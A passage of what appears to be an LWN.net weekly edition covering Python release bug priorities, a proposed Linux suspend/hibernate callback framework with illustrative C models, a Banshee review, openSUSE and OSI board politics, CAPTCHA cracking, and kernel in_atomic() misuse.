release.  In some sense, both are "critical" and "show-stopping" (depending
on which show you are focused on).  Brett Cannon reported the scheme they came up
with: 

So "release blocker" blocks a release. "Critical" could very easily
block a release, but not the current one. "High" issues should be
addressed, but won't block anything. "Normal" is normal. And "low" is
for spelling errors and such.


This can elevate bugs that are relatively minor, but need to be handled
before a final release, into a category that inflates their importance.
But, not elevating the bugs can lead to them incorrectly being set aside
for a later release.  van Rossum wondered about this bug priority
"inflation", but it
is the way that 2.6/3.0 release manager Barry Warsaw wants to handle things:

Critical is the right one to use.  Neal and I will basically be moving
issues between 'release blocker' and 'critical' with the former
meaning this issue blocks the upcoming release.


Other projects or project managers might make different decisions on how to
handle bug priorities, but the important thing is to make a reasonable
decision quickly.  Once that was done, the tasks were added to the tracker
and could be prioritized correctly within the framework and without a lot of hand-wringing about
which way is "best".  Deciding quickly is an important skill for project managers of all
kinds to learn.


Things are progressing rapidly on python-dev these days, which is not
surprising with two major releases due in less than six months.  There is a lot
of work to be done, but the Python hackers aren't shrinking from those
tasks.  The team has also been able to change its processes as
needed to support the tight schedule.  With hard work and a bit of
luck, that should put Py3k and its 2.6 sibling on our development machines
by autumn.


		A new suspend/hibernate infrastructure


While attending conferences, your editor has, for some years, made a point
of seeing just how many other attendees have some sort of suspend and
resume functionality working on their laptops.  There is, after all,
obvious value in being able to sit down in a lecture hall, open the lid,
and immediately start heckling the speaker via IRC without having to wait
for the entire bootstrap sequence to unfold.  But, regardless of whether
one is talking about suspend-to-RAM ("suspend") or suspend-to-disk
("hibernation"), there are surprisingly few people using this capability.
Despite the efforts which have been made by developers and distributors,
suspend and hibernate still just do not work reliably for a lot of people.  

For your editor, suspend always works, but the success rate of the
resume operation is about 95% - just enough to keep using it while
inspiring a fair amount of profanity in inopportune places.


Various approaches to fixing suspend and hibernation have been proposed;
these include TuxOnIce and kexec jump.  Another
possibility, though, is to simply fix the code which is in the kernel now.
There is a lot that has to be done to make that goal a reality, including
making the whole process more robust and separating the suspend and
hibernation cases which, as Linus has stated rather strongly several times,
are really two different problems.  To that end, Rafael Wysocki has posted
a new suspend and hibernation
infrastructure for devices which has the potential to improve the
situation - but at a cost of creating no fewer than 20 separate device
callbacks.


For the (relatively) simple suspend case, there are four basic callbacks
which should be provided in the new pm_ops structure by each bus
and, eventually, by every device: prepare(), suspend(),
resume(), and complete().


When the system is suspending, each device will first see a call to its
prepare() callback.  This call can be seen as a sort of warning
that the suspend is coming, and that any necessary preparation work should
be done.  This work includes preventing the addition of any new child
devices and anything which might require the involvement of user space.
Any significant memory allocations should also be done at this time; the
system is still functional at this point and, if necessary, I/O can be
performed to make memory available.  What should not happen in
prepare() is actually putting the device into a low-power state;
it needs to remain functional and available.

As usual, a return value of zero indicates that the preparation was
successful, while a negative error code indicates failure.  In cases where
the failure is temporary (a race with the addition of a new child device is
one possibility), the callback should return -EAGAIN, which will
cause a repeat attempt later in the process.

At a later point, suspend() will be called to actually power down
the device.  With the current patch, each device will see a
prepare() call quickly followed by suspend().  Future
versions are likely to change things so that all devices get a
prepare() call before any of them are suspended; that way, even
the last prepare() callback can count on the availability of a
fully-functioning system.

The resume process calls resume() to wake the device up, restore
it to its previous state, and generally make it ready to operate.  Once the
resume process is done, complete() is called to clean up anything
left over from prepare().  A call to complete() could
also be made directly after prepare() (without an intervening
suspend) if the suspend process fails somewhere else in the system.
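
The ordering described above can be modeled in user space.  The sketch below
is not the kernel's code: the pm_ops_model structure, the stand-in struct
device, the demo callbacks, and all of the function signatures are
assumptions made for illustration.  Only the callback names and the
return-value convention (zero for success, a negative error code for
failure, -EAGAIN for "try again") come from the description above.  The
retry is also simplified; here it happens immediately rather than later in
the process.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>

/* Stand-in for the kernel's struct device; hypothetical. */
struct device {
	const char *name;
	int prepared;   /* set by prepare(), cleared by complete() */
	int powered;    /* cleared by suspend(), set by resume() */
};

/* The four suspend-path callbacks; the signatures are assumed. */
struct pm_ops_model {
	int  (*prepare)(struct device *dev);
	int  (*suspend)(struct device *dev);
	int  (*resume)(struct device *dev);
	void (*complete)(struct device *dev);
};

/*
 * Run one device through a suspend/resume cycle.  All four callbacks
 * must be non-NULL.  Returns 0 on success or a negative error code.
 * complete() is called whenever prepare() succeeded, even if suspend()
 * failed, so that anything set up by prepare() is undone.
 */
int model_suspend_cycle(struct device *dev, const struct pm_ops_model *ops,
			int max_retries)
{
	int ret, tries = 0;

	assert(dev && ops);

	/* Repeat prepare() while it reports a temporary failure. */
	do {
		ret = ops->prepare(dev);
	} while (ret == -EAGAIN && tries++ < max_retries);
	if (ret)
		return ret;

	ret = ops->suspend(dev);
	if (ret == 0)
		ret = ops->resume(dev);   /* the system "slept" in between */

	ops->complete(dev);
	return ret;
}

/* Demo callbacks: prepare() fails once to imitate a transient race. */
static int demo_prepare_calls;

static int demo_prepare(struct device *dev)
{
	if (demo_prepare_calls++ == 0)
		return -EAGAIN;
	dev->prepared = 1;
	return 0;
}

static int demo_suspend(struct device *dev) { dev->powered = 0; return 0; }
static int demo_resume(struct device *dev)  { dev->powered = 1; return 0; }
static void demo_complete(struct device *dev) { dev->prepared = 0; }

const struct pm_ops_model demo_ops = {
	demo_prepare, demo_suspend, demo_resume, demo_complete
};
```

Calling model_suspend_cycle() on a device with demo_ops and a retry limit
of a few attempts runs prepare() twice (the first attempt returns -EAGAIN),
then suspend(), resume(), and complete(), leaving the device powered and no
longer marked as prepared.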


The hibernation process is more complicated, in that there are more
intermediate states.  In this case, too, the process begins with a call to
prepare().  Then calls are made to freeze() and poweroff().


The freeze() callback happens before the hibernation image (the
system image which is written to persistent store) is created; it should
put the device into a quiescent state but leave it operational.  Then,
after the hibernation image has been saved and another call to
prepare() made, poweroff() is called
to shut things down.

When the system is powered back up, the process is reversed through calls
to quiesce() and restore().


The call to quiesce() will happen early in the resume process, 
after the hibernation image has been loaded from disk, but before it has
been used to recreate the pre-hibernation system's memory.  This callback
should quiet the device so that memory can be reassembled without being
corrupted by device operations.  A call to complete() will follow,
then a call to restore(), which should put the device back into a
fully-functional state.  A final complete() call finishes the
process.

There are still two more hibernation-related callbacks: thaw() and recover().


These functions will be called when things go wrong; once again, each of
these calls will be followed by a call to complete().  The purpose
of thaw() is to undo the work done by freeze() or
quiesce(); it should put the device back into a working state.
The recover() call will be made if the creation of the hibernation
image fails, or if restoring from that image fails; its job is to clean up
and get the hardware back into an operating state.
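
With this many callbacks, it may help to see the hibernation ordering
written down as data.  The following is a sketch only: the enum, the tables,
and pm_describe() are invented for this illustration and are not part of the
patch.  The tables simply encode the order of calls as described above; the
thaw() and recover() error paths are left out because their exact position
in the sequence is not spelled out.

```c
#include <assert.h>
#include <stddef.h>

/* The ten callback names mentioned in the text, used as table indices. */
enum pm_step {
	PM_PREPARE, PM_COMPLETE, PM_SUSPEND, PM_RESUME,
	PM_FREEZE, PM_POWEROFF, PM_QUIESCE, PM_RESTORE,
	PM_THAW, PM_RECOVER,
	PM_NR_STEPS
};

static const char *const pm_step_names[PM_NR_STEPS] = {
	"prepare", "complete", "suspend", "resume",
	"freeze", "poweroff", "quiesce", "restore",
	"thaw", "recover",
};

/* Order of calls on the way down, as described in the text. */
static const enum pm_step hibernate_down[] = {
	PM_PREPARE, PM_FREEZE,     /* before the image is created */
	PM_PREPARE, PM_POWEROFF,   /* after the image has been saved */
};

/* Order of calls when coming back up from a hibernation image. */
static const enum pm_step hibernate_up[] = {
	PM_QUIESCE, PM_COMPLETE,   /* image loaded, memory not yet rebuilt */
	PM_RESTORE, PM_COMPLETE,   /* device fully functional again */
};

#define ARRAY_LEN(a) (sizeof(a) / sizeof((a)[0]))

/*
 * Store the callback names for a sequence in out[] (at most max
 * entries) and return the number of steps in the sequence.
 */
size_t pm_describe(const enum pm_step *seq, size_t n,
		   const char **out, size_t max)
{
	size_t i;

	for (i = 0; i < n && i < max; i++) {
		assert(seq[i] < PM_NR_STEPS);
		out[i] = pm_step_names[seq[i]];
	}
	return n;
}
```

Passing hibernate_down or hibernate_up to pm_describe() yields the callback
names in calling order, which can then be printed or compared against a
driver's own trace.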


For added fun, there are actually two sets of pm_ops callbacks.  One
is for normal system operation, but there is another set intended to be
called when interrupts are disabled and only one CPU is operational - just
before the system goes down or just after it comes back up.
Clearly, interactions with devices will be different in such an
environment, so different callbacks make sense.  But the result is that
fully 20 callbacks must be provided for full suspend and hibernate
functionality.  These callbacks have been added to the bus_type
structure as:


Fields by the same name have also been added to the pci_driver
structure, allowing each device driver to add its own version of these
callbacks.  For now, the old PCI driver suspend() and
resume() callbacks will be used if the pm_ops structures
have not been provided, and no drivers have been converted (at least in the
patch as posted).
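
The fallback to the old callbacks can be pictured with a small user-space
model.  Everything here is hypothetical: pci_driver_model, pm_ops_model, the
legacy_* field names, and the simplified callback signatures are assumptions
for the sake of the sketch and do not reproduce the real pci_driver
structure.  The only behavior taken from the description above is that the
old callbacks are used when no new-style structure has been provided.

```c
#include <assert.h>
#include <stddef.h>

/* Stand-in for a device; hypothetical, for illustration only. */
struct device {
	int powered;
};

/* New-style callbacks; only the suspend/resume pair is modeled. */
struct pm_ops_model {
	int (*suspend)(struct device *dev);
	int (*resume)(struct device *dev);
};

/* A driver that may or may not have been converted to the new scheme. */
struct pci_driver_model {
	const struct pm_ops_model *pm;              /* NULL until converted */
	int (*legacy_suspend)(struct device *dev);  /* old-style callback */
	int (*legacy_resume)(struct device *dev);   /* old-style callback */
};

enum pm_path { PM_PATH_NONE, PM_PATH_LEGACY, PM_PATH_NEW };

/*
 * Suspend one device.  The new-style callback is used when the driver
 * supplies one; otherwise the legacy callback is tried.  The callback's
 * return value is stored in *ret and the path taken is returned.
 */
enum pm_path model_pci_suspend(const struct pci_driver_model *drv,
			       struct device *dev, int *ret)
{
	assert(drv && dev && ret);
	*ret = 0;

	if (drv->pm && drv->pm->suspend) {
		*ret = drv->pm->suspend(dev);
		return PM_PATH_NEW;
	}
	if (drv->legacy_suspend) {
		*ret = drv->legacy_suspend(dev);
		return PM_PATH_LEGACY;
	}
	return PM_PATH_NONE;   /* nothing to call; treated as success */
}

/* Example callback: simply marks the device as powered down. */
int model_power_down(struct device *dev)
{
	dev->powered = 0;
	return 0;
}
```

A driver with only legacy_suspend set takes the PM_PATH_LEGACY branch; once
it gains a pm pointer, the same call takes PM_PATH_NEW without any change to
the caller.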

As of this writing, discussion of the patch is hampered by an outage at
vger.kernel.org.  There are some concerns, though, and things are likely to
change in future revisions.  Among other things, the number of "no IRQ"
callbacks may be reduced.  But, with luck, the final resolution will leave
us all in a position where suspend and hibernate work reliably.

		The Banshee Music Management and Playback Utility


The Banshee project
is creating a music management and playback utility for the GNOME
desktop.  The Banshee home page states:


Import, organize, play, and share your music using Banshee's simple, powerful interface.
Rip CDs, play and sync your iPod, create playlists, and burn audio and MP3 CDs. Most portable music devices are supported.
Banshee also has support for podcasting, smart playlists, music recommendations, and much more.


Version 1.0 Alpha 1 (0.98.1) of Banshee has been
announced.
New features in this release include:

A code rewrite with an emphasis on performance improvements and better resource usage.
A new Album Browser feature with the ability to display album artwork.
A Play Queue feature for building on-the-fly music playlists.
New search capabilities for locating artists, albums and song titles.
Integration with the Last.fm music sharing service.
A built-in 10 band audio equalizer.
The new ability to play from a playlist while browsing new sources.


The version 1-0.98.1 change log file has more detailed information on the new release.

This 1.0 alpha release of Banshee is missing a number of features that were present in the earlier 0.13.2 version.  There is no support for hardware
devices yet, so it is not possible to import or burn CDs, talk to iPod
devices or deal with USB or MTP devices.  Numerous plugins have also
been left out, so it is not possible to access podcasts, internet radio,
music sharing services, etc.  The release announcement states:


Do not despair, these features will be added back before the final 1.0 release. Many hardware related features are projected to land in the Alpha 2 and 3 releases of Banshee 1.0. We expect releases in quick succession leading up to the final 1.0 release.

Banshee 1-0.98.1 was installed on a system running an Athlon XP 1700
processor and 512MB of RAM.  The operating system was the alpha 6
release of Ubuntu Hardy Heron for i386.
The following steps were required to get the software running:


Banshee fired up as expected.  Your author converted a few CDs
to flac files and copied them to the system for testing.
It did not take much effort
to figure out how to play individual tracks and build playlists.
The standard play/pause buttons and skip to previous or next track
buttons worked as one would expect.  The built-in equalizer worked,
although it tended to produce audible clipping if a frequency band
was turned up too high.


Unlike earlier versions of Banshee,
the only internet music channel shown in version 1.0 was Last.fm.
It was possible to use the standalone last.fm binary to access the
site, but Banshee was only able to list the selections, not play them.
The error message "don't know how to handle audio/mpeg..."
led to the source of the problem.  The installation page was
consulted, a large collection of
gstreamer0.10-plugins was installed with the Synaptic package
manager, and Banshee was restarted.  Last.fm content then came through
loud and clear.
One final issue was noticed with Banshee.  When the application was
run from the command line and exited using the GUI, it left the
GNOME terminal in a locked-up state.


Future releases of Banshee will likely include fixes for
some of the aforementioned issues.  Banshee is an interesting
application that can be used for combining a wide variety
of audio listening functions in one place.


		Electing the openSUSE board


The openSUSE project is taking another step
toward becoming a true community project.  The current openSUSE board, appointed by
Novell, will soon be replaced by an elected board.  The question that is
being debated on the opensuse-project
mailing list is "Who can vote for the openSUSE board?"

Among the openSUSE community there are Members and a larger number of Users.  "'openSUSE Members'
are specifically distinguished contributors who have brought a continued
and substantial contribution to the openSUSE project. They are approved by
the openSUSE board."
Becoming a user is as easy as registering on the wiki.

Some possible answers to the "who can vote" question include:

   members only
   anyone (members + registered users)
   members + non-members vouched for by members
   members + users who have signed the Guiding Principles


At this time the number of members is low.  There are concerns that having
members (who are appointed by the board) as the only voters for the board
could exclude the greater community.  On the other hand, opening up
elections to the greater user community is difficult to police.  It should
be verifiable that those who are eligible to vote have only one vote
counted.  Other projects may serve as a guide for this issue.

Debian has the Debian Voting
Information page which defines how voting is done and how votes are
counted.  Debian restricts voting to Debian Developers (DDs), who must sign
their vote with a key that is also on the official keyring.  DDs may
vote more than once, but only the last vote is counted, so voting is
restricted and it's easy to ensure one-vote-per-person.

The Fedora project has defined Fedora Board
Elections more recently than Debian.  This document states that 5 of 9
seats on the board are appointed by the board.  Voting is open for the
remaining seats to those who have a valid account in the Fedora Account
System.  Getting an account on the
Fedora Account System requires an application and approval process that
is somewhat similar to becoming an openSUSE Member.

The GNOME Foundation
Elections process was also raised as a model.  GNOME membership is open to
any contributor willing to go through the application process.

Given those three examples, it does seem that voting privileges are
typically restricted to a subset of the community that has made both a
commitment and continuing contributions to the project.  The main
difference is that openSUSE membership is relatively new and is therefore a
small segment of the greater community.  Over time the membership will grow
and members-only elections may become more appealing.  In any case, the
procedures that are defined for this election may be changed for subsequent
elections.

		Breaking CAPTCHA


Perhaps someday it will be considered discrimination against a sentient,
but these days a way to distinguish between programs and humans is required
for many web-based applications.  Keeping spambots from posting comments in
weblogs or other bots from signing up for a web service are two of the most
common applications for separating humans and bots.  As has often been the
case in the past, though, when the stakes are high enough, attackers will
find ways to circumvent barriers like this.


The most common means of testing for humans in web site sign-ups and the
like is a CAPTCHA
(Completely Automated Public Turing test to tell Computers and Humans
Apart).  Typically these are images that contain some text that has been
mangled so that it is still recognizable by humans, but not by
programs—at least that is the theory.  Variations on the theme
include asking math or "common sense" questions that programs
will supposedly not be able to figure out, though it is more likely that no
attacker has had enough interest in breaking them.  Serious CAPTCHAs
tend to use images that can be created on the fly, giving nearly infinite
variety. 


Some of the most sophisticated CAPTCHAs are those used by various free web
mail services: Hotmail, Yahoo, and Gmail.  These services provide quite a
bit of storage that might be of use to an attacker, but they also lend
their reputation to mail that gets sent from those accounts.  Domains like
yahoo.com and gmail.com are very unlikely to be blacklisted.  Mail coming
from those domains may also score lower in various spam testing rules,
which may be exactly what an attacker is looking for.


Various techniques have been tried in the past to circumvent CAPTCHAs, with
the most successful ones using humans.  It seems that many folks will
happily solve
CAPTCHAs in order to view pornography or for cash.
Over the last year, though, CAPTCHA-breaking programs have started to appear.


In a very
detailed report, Websense presents evidence that Gmail's CAPTCHA has
been cracked.  Earlier reports indicate that attackers have cracked
Yahoo, Windows Live, and Hotmail CAPTCHAs as well.  Cracked does not mean a
100% success rate (even humans cannot achieve that); the attack just needs
to work often enough to provide the attackers with the accounts they want.


These programs use some image processing and optical character recognition
(OCR) techniques to decipher the puzzle, removing humans from the equation
entirely.  Typical success rates are in the 20-35% range.  For attackers
with botnets available to spread out the work, this could yield an amazing
number of accounts in relatively short order.


CAPTCHAs have a number of bad characteristics: they are annoying to most
and unusable by those who are visually impaired.  Yet they are pervasive.
Alternate techniques using audio have so far been found wanting; a more
interesting method is Asirra from Microsoft
Research. 


Asirra uses 3 million images of dogs and cats from animal shelters that
have been categorized.  The test then shows a dozen random
images from the database and asks the "human" to select all the cat
photos.  This would seem much more difficult for a program to handle.  The
picture database would need regular updates to thwart attackers just
collecting all the images and doing their own categorization—perhaps with
help from porn viewers or poor folk.  Also, 
computer recognition systems will someday be able to recognize dogs and cats.


It is a difficult problem to solve, but one that needs to be addressed.
Systems like OpenID are not
enough—it is not what they were designed for—as there is nothing stopping bots from having
OpenIDs.  Some mechanism that would allow reputation or trust to accumulate on a
given ID might help prove that its holder is a human—or at least a
well-behaved bot.  Designing a reputation service that is decentralized will also be difficult, but it is the right direction for
solving these kinds of problems.


		Bruce Perens and the OSI board


The Open Source Initiative (OSI) was
formed almost ten years ago to safeguard the "Open Source" name.  Over the
years it has approved licenses and attempted some other activities while,
generally, having little relevance to the wider community.  It has often
been seen as a relatively closed and non-democratic organization.  Now one
of OSI's founders is trying to get back into the organization and change
its direction; the outcome of the resulting discussion may (or may not)
change the direction of the OSI.


Bruce Perens has launched a bid to be elected to the OSI
board of directors, but this bid has
not been particularly well received by the current board.  His on-line petition to collect community support
specifies a number of reasons that he wants to be on the board—those
reasons are ruffling some feathers.  Outgoing board member Matt Asay has taken Perens to
task for some of his statements as has OSI president
Michael Tiemann.


Perens's reasons for wanting to be on the board are threefold: reducing the
over-representation of vendors, trying to ensure Microsoft does not get a
seat on the board, and reducing license proliferation.  The idea of a Microsoft seat on
an open source organization's board is sure to rile a segment of the
community, which is undoubtedly part of what Perens is hoping for.  The
likelihood of that happening is pretty small, though.  Tiemann makes it
clear that the board doesn't elect companies at all:

The OSI nominates people to the board despite their corporate affiliations,
not because of them. The idea that the OSI would elect a "Microsoft" board
member is as absurd as the idea that we'd elect a "Google" board member or
an "IBM" board member. We elect people based on their own merits, not the
merits (or demerits) of the companies or organizations they are affiliated
with. 


Microsoft and its employees do not currently contribute to open source in
any substantial
way, so there is little that would lead the board to nominate them.  If that ever
changes, it would be pretty disingenuous to deny someone a seat because of
their employer's past (or even, at that time, current)
misbehavior.  In addition, it is hard
to see how one board member—Perens or someone "controlled" by
Microsoft—is going to make such a crucial difference in what the board
does anyway.  In many ways, the Microsoft connection is
a red herring—one sure to rally the troops, though. 


Reducing license proliferation is a noble goal, one that the OSI tried to
tackle a few years back without much in the way of tangible success.
Perens states that he would like to see OSI do more to reduce the number of
licenses, but his claims about the number of licenses needed have raised
eyebrows:

Another problem is the failure to reduce the number of different licenses
in general use. My own work in this area shows that only four licenses, all
compatible with each other, can satisfy all common business and
non-business purposes of Open Source development. Three of these licenses
have essentially the same text, and the fourth is very short. Life would be
easier if more projects used them. While it would be difficult to shut down
approval of new licenses, I think OSI could be more proactive at reducing
license proliferation.


Part of the reason that Tiemann and others are skeptical is some
obvious bad blood between the board and Perens over the license
proliferation committee.  LWN covered some of that "debate" in
August 2005.  Perens clearly believes he should have been a
member just as strongly as others on the board seem to feel he should not
have been.  When the committee was formed without him as a member, Perens
refused to participate in the process in any way.  It
seems to stick in the craw of some for Perens to now claim that he has the
solution.  Russ Nelson, former OSI president and current board
member—as well as a member of the committee—sums up the
frustration in a comment on Tiemann's post:

I don't see how Bruce can claim to have a short list of four licenses. I
start with BSD, GPLv2, GPLv3, LGPLv2 and LGPLv3 and that's five. If he
thinks that people should simply agree with him that all GPLv2 should be
relicensed GPLv3, I invite him to spend some time with Linus Torvalds, who
notoriously and politely disagrees.

Having a solution is not the same as convincing people to adopt it.


It is rather interesting to see Perens trying to get back on the board that
he famously resigned from in 1999
after having founded the organization with Eric Raymond in 1998.  This is
not the first time Perens has lost interest and/or resigned from some form of community
leadership position; Debian and UserLinux spring to mind.  Though none of
the expressed concerns about his candidacy have mentioned it, some must be
wondering how long it would be before ideology or a shifting focus caused
Perens to move on from a board position if he were elected.


Perens has been an excellent advocate for free software and/or open source
over the years, but his tendency towards self-promotion
grates on some.  It may not be an ego thing, as he claims, but it certainly
rubs some people the wrong way.  The ego issue is one of the reasons that board observer Andrew Oliver does
not support Perens for the board:

A return to a very Amerocentric hacker culture voice with big egos is not
the answer to OSI's problems. I think OSI is on the path to real
fundamental change. I'd like to hear Bruce explain what he'd do differently
in collaboration with others who may not always agree with him.


Asay certainly doesn't see Perens as
having the right credentials either:

The OSI needs a vibrant membership of those currently shaping the open
source landscape. It's possible that its current make-up doesn't reflect
this. Point well taken. But it's equally possible - indeed, I'd say
probable - that Bruce's directorship wouldn't change this. I like Bruce but
aside from the occasional picketing he does, I can't point to anything
substantive he has done for open source in the past half-decade or so.


The petition drive came about because Tiemann encouraged Perens to show
that there was strong community support for him to be a part of the board.
As of this writing, the petition has garnered more than 1700 "signatures",
which Perens believes is enough:

Regarding my candidacy, OSI's board, through its president, asked me to
show an uprising of strong community support if the board was to to elect
me. I have. Now that I have done what you asked, are you going to hide
behind complaints about my campaign, which is really quite mild in its
criticism and is in no way the "scorched earth" that Matt refers to, or are
you going to do what you said? If you OSI can't handle a political opponent
on my laid-back scale, you'd only looking for yes-men.


The OSI board is "self-replacing" with current board members nominating and
electing candidates for empty slots.  Each director serves for a three-year
term, with roughly one-third coming up for election each year—though
this year there are five slots to be filled.  Three directors are standing
for re-election, leaving two slots open.  Unfortunately, it's not clear
when the actual election will be held, nor is there likely to be any
advance notice of who has been nominated.  Transparency, it seems, is not
one of the attributes of OSI.


Self-replacement and overlapping terms of office tend to give a certain
stability to a board, but they also create a kind of inbreeding.  It is
unlikely that a board will nominate people who think substantially
differently from themselves.  This is one thing that Perens is trying to
circumvent with his very public candidacy.  Whatever else can be said about
Perens's candidacy, it is clear that he would bring a different voice into
the OSI boardroom.


But, what is OSI really?  Is it an organization that is somehow
supposed to represent all of the diverse voices in the community?  At the moment it appears to exist for
the purpose of approving licenses and "protecting the Open Source Definition".
Perens thinks it could be more than that.  OSI itself seems to agree as
they have been moving towards more relevance in the community.  Oliver
describes that effort:

OSI is trying to solve its problems, by becoming more grassroots and less
bottom up. Meanwhile, it is trying to grow the movement by expanding its
international representation. Corporations do influence OSI, in that not
all of the board has a free hand to say what is on their mind
publicly. However, the solution is to make the OSI board what it should
be: a governance board.


OSI and its board are currently in a state of flux, trying to define a
role for themselves that is broader than just a license approval body.  There
doesn't seem to be a lot of discontent within the board that might
lead to Perens or another controversial figure being added.  Whether this
leads to continued stagnation or a more vibrant OSI remains to be seen.  A
more interesting question might be: will anyone care?


If OSI starts to do visible things for the community, it will finally
acquire some relevance.  Given the attitude towards his candidacy, it seems
unlikely that Perens will be able to lead the board in that direction.
Which leaves it up to the current board and the two new
members (neither of whom is likely to be Perens) to find a way
to make the community care.


		Atomic context and kernel API design


An API should refrain from making promises that it cannot keep.  A recent
episode involving the kernel's in_atomic() macro demonstrates how
things can go wrong when a function does not really do what it appears to
do.  It is also a good excuse to look at an under-documented (but
fundamental) aspect of kernel code design.

Kernel code generally runs in one of two fundamental contexts.  Process
context reigns when the kernel is running directly on behalf of a (usually)
user-space process; the code which implements system calls is one example.
When the kernel is running in process context, it is allowed to go to sleep
if necessary.  But when the kernel is running in atomic context, things
like sleeping are not allowed.  Code which handles hardware and software
interrupts is one obvious example of atomic context.  


There is more to it than that, though: any kernel function moves into
atomic context the moment it acquires a spinlock.  Given the way spinlocks
are implemented, going to sleep while holding one would be a fatal error;
if some other kernel function tried to acquire the same lock, the system
would almost certainly deadlock forever.  


"Deadlocking forever" tends not to appear on users' wishlists for the
kernel, so the kernel developers go out of their way to avoid that
situation.  To that end, code which is running in atomic context carefully follows a
number of rules, including (1) no access to user space, and,
crucially, (2) no sleeping.  Problems can result, though, when a
particular kernel function does not know which context it might be invoked
in.  The classic example is kmalloc() and friends, which take an
explicit argument (GFP_KERNEL or GFP_ATOMIC) specifying
whether sleeping is possible or not.


The wish to write code which can work optimally in either context is
common, though.  Some developers, while trying to write such code, may well
stumble across the following definitions from
<linux/hardirq.h>:


It would seem that in_atomic() would fit the bill for any
developer trying to decide whether a given bit of code needs to act in an
atomic manner at any specific time.  A quick grep through the kernel
sources shows that, in fact, in_atomic() has been used in quite a
few different places for just that purpose.
There is only one problem: those uses are almost certainly all wrong.  


The in_atomic() macro works by checking whether preemption is
disabled, which seems like the right thing to do.  Handlers for events like
hardware interrupts will disable preemption, but so will the
acquisition of a spinlock.  So this test appears to catch all of the cases
where sleeping would be a bad idea.  Certainly a number of people who have
looked at this macro have come to that conclusion.

But if preemption has not been configured into the kernel in the first
place, the kernel does not raise the "preemption count" when spinlocks are
acquired.  So, in this situation (which is common - many distributors still
do not enable preemption in their kernels), in_atomic() has no way
to know if the calling code holds any spinlocks or not.  So it will return
zero (indicating process context) even when spinlocks are held.  And that
could lead to kernel code thinking that it is running in process context
(and acting accordingly) when, in fact, it is not.  
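
The failure mode described above can be illustrated with a small user-space toy model. This is only a sketch: the ToyKernel class and its methods are hypothetical names invented for illustration, it ignores interrupt handlers entirely, and it is not how the kernel actually implements any of this. It only shows why a test based on the preemption count alone cannot see held spinlocks when preemption is not configured.

```python
class ToyKernel:
    """Toy model of preempt-count bookkeeping; not real kernel code."""

    def __init__(self, preempt_configured):
        self.preempt_configured = preempt_configured
        self.preempt_count = 0
        self.spinlocks_held = 0

    def spin_lock(self):
        self.spinlocks_held += 1
        # Only a preemptible kernel accounts for spinlocks in the count.
        if self.preempt_configured:
            self.preempt_count += 1

    def spin_unlock(self):
        self.spinlocks_held -= 1
        if self.preempt_configured:
            self.preempt_count -= 1

    def in_atomic(self):
        # Mirrors the idea of the macro: look only at the preempt count.
        return self.preempt_count != 0

    def sleeping_is_safe(self):
        # Ground truth, which the count cannot reveal without preemption.
        return self.spinlocks_held == 0


def demo(preempt_configured):
    """Take one spinlock and report (in_atomic(), sleeping_is_safe())."""
    kernel = ToyKernel(preempt_configured)
    kernel.spin_lock()
    result = (kernel.in_atomic(), kernel.sleeping_is_safe())
    kernel.spin_unlock()
    return result


if __name__ == "__main__":
    print("preemptible kernel:    ", demo(True))
    print("non-preemptible kernel:", demo(False))
```

In the non-preemptible case the model reports that it is not in atomic context even though sleeping would be unsafe, which is exactly the trap described above.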


Given this problem, one might well wonder why the function exists in the
first place, why people are using it, and what developers can really do to
get a handle on whether they can sleep or not.  Andrew Morton answered the first question in a relatively
cryptic way:


	in_atomic() is for core kernel use only.  Because in special
	circumstances (ie: kmap_atomic()) we run inc_preempt_count() even
	on non-preemptible kernels to tell the per-arch fault handler that
	it was invoked by copy_*_user() inside kmap_atomic(), and it must
	fail.


In other words, in_atomic() works in a specific low-level
situation, but it was never meant to be used in a wider context.  Its
placement in hardirq.h next to macros which can be used
elsewhere was, thus, almost certainly a mistake.  As Alan Stern pointed out, the fact that Linux
Device Drivers recommends the use of in_atomic() will not have
helped the situation.  Your editor recommends that the authors of that book
be immediately sacked.

Once these mistakes are cleared up, there is still the question of just
how kernel code should decide whether it is running in an atomic context or
not.  The real answer is that it just can't do that.  Quoting Andrew Morton again:


	 The consistent pattern we use in the kernel is that callers keep
	 track of whether they are running in a schedulable context and, if
	 necessary, they will inform callees about that.  Callees don't
	 work it out for themselves.


This pattern is consistent throughout the kernel - once again, the GFP_
flags example stands out in this regard.  But it's also clear that this practice has
not been documented to the point that kernel developers understand that
things should be done this way.  Consider this recent
posting from Rusty Russell, who understands these issues better than
most:


	This flag indicates what the allocator should do when no memory is
	immediately available: should it wait (sleep) while memory is freed
	or swapped out (GFP_KERNEL), or should it return NULL immediately
	(GFP_ATOMIC). And this flag is entirely redundant: kmalloc() itself
	can figure out whether it is able to sleep or not.


In fact, kmalloc() cannot figure out on its own whether sleeping
is allowable or not.  It has to be told by the caller.  This rule is
unlikely to change, so expect a series of in_atomic() removal
patches starting with 2.6.26.  Once that work is done, the
in_atomic() macro can be moved to a safer place where it will not
create further confusion.
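
The convention Morton describes, in which the caller tells the callee whether sleeping is allowed, can be sketched with a toy allocator. Everything here is an assumption made for illustration: the Gfp enumeration and the ToyAllocator class are hypothetical stand-ins loosely modeled on the GFP_KERNEL and GFP_ATOMIC flags, and "sleeping" is reduced to a counter.

```python
from enum import Enum


class Gfp(Enum):
    """Hypothetical stand-ins for the GFP_KERNEL / GFP_ATOMIC flags."""
    KERNEL = "caller may sleep"
    ATOMIC = "caller must not sleep"


class ToyAllocator:
    """Toy allocator: the caller, not the allocator, decides on sleeping."""

    def __init__(self, free_pages, reclaimable_pages):
        self.free_pages = free_pages
        self.reclaimable_pages = reclaimable_pages
        self.sleeps = 0  # how often we "slept" waiting for reclaim

    def alloc(self, flag):
        if self.free_pages > 0:
            self.free_pages -= 1
            return "page"
        if flag is Gfp.ATOMIC:
            # The caller said it cannot sleep, so fail immediately.
            return None
        # Gfp.KERNEL: the caller promised that sleeping is acceptable.
        if self.reclaimable_pages > 0:
            self.reclaimable_pages -= 1
            self.sleeps += 1
            return "page"
        return None


if __name__ == "__main__":
    allocator = ToyAllocator(free_pages=0, reclaimable_pages=1)
    print(allocator.alloc(Gfp.ATOMIC))  # fails rather than sleeping
    print(allocator.alloc(Gfp.KERNEL))  # "sleeps" once, then succeeds
```

The allocator never tries to guess its context; the only information it has about sleeping comes from the flag passed in by the caller.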

		Kernel markers and binary-only modules


Kernel markers are a
mechanism which allows developers to put static tracepoints into the
kernel.  Once placed, these markers can be used by operations staff to
trace well-known events in running systems without that staff having to
know about kernel code.  Solaris provides a long list of static tracepoints
